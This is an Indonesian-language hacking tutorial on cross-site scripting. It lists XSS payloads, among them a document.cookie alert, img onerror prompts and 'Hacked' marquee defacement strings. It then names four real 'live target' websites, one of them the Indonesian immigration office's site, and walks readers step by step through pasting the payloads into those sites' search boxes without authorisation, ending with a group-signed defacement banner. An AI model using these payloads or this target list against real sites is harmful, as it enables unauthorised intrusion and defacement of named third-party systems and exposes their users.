Assalamualaikum bro. Kali ini saya akan memberikan sedikit tutorial atau berbagi materi kepada kalian. Yaitu Tutorial (XSS)
XSS ?
XSS merupakan kependekan yang digunakan untuk istilah cross site scripting. XSS merupakan salah satu jenis serangan injeksi code. XSS dilakukan oleh penyerang dengan cara memasukkan kode HTML atau client script code lainnya ke suatu situs. Serangan ini akan seolah-olah datang dari situs tersebut
PAYLOAD NYA
• ><script>alert(document.cookie)</script>
• <marquee>nick lu</marquee>
• "><marquee>Hacked
• "><h1>Hacked
• <ScRipT>alert("INJECT BY");</ScRipT>
• "><img src=x onerror=prompt(1)>
• "><img src=x onerror=prompt(Document.domain)>
LIVE TARGET
• https://www.pilgrimsgroup.com/news.php?id=94
• https://www.wareng-wonosari.desa.id/first/index
• https://www.imigrasi.go.id/
• https://bangkaterkini.id/search
1) Pertama kalian cari web yang Vuln terhadap serangan ( XSS ) Kalian bisa pake live Target yang Vuln terhadap serangan ( XSS ) Pilih salah satu web yang sudah saya sediakan di atas, Copas aja di browser kalian masing²
-
2) Jika kalian udh masuk ke salah satu live target, lgsg saja kalian, masukkan salah satu payload yang udh saya sediakan,
<marquee><h1><font color="blue">XXS CODE BY<font color="red">P5XPloiterCrew In Your Area</font></h1></marquee>
Ini payload yang akan saya gunakan. Oiyah btw ini saya kasih sedikit code html biar terlihat berwarna ataupun menarik, kalian pastekan di kolom pencarian web tsb, contohnya seperti berikut
3) Jika udh kalian bisa click enter yang ada di keyboard kalian, Jika berhasil payload yang saya pake ataupun kalian makan akan ada tulisan berjalan, seperti contoh screenshot di bawah ini
4) Oke, mungkin segitu saja tutorial kali ini yang bisa saya share kepada kalian, kalian bisa pake payload nya satu persatu,
-
Sekian dulu tutorial kali ini semoga bermanfaat bagi kalian semua,
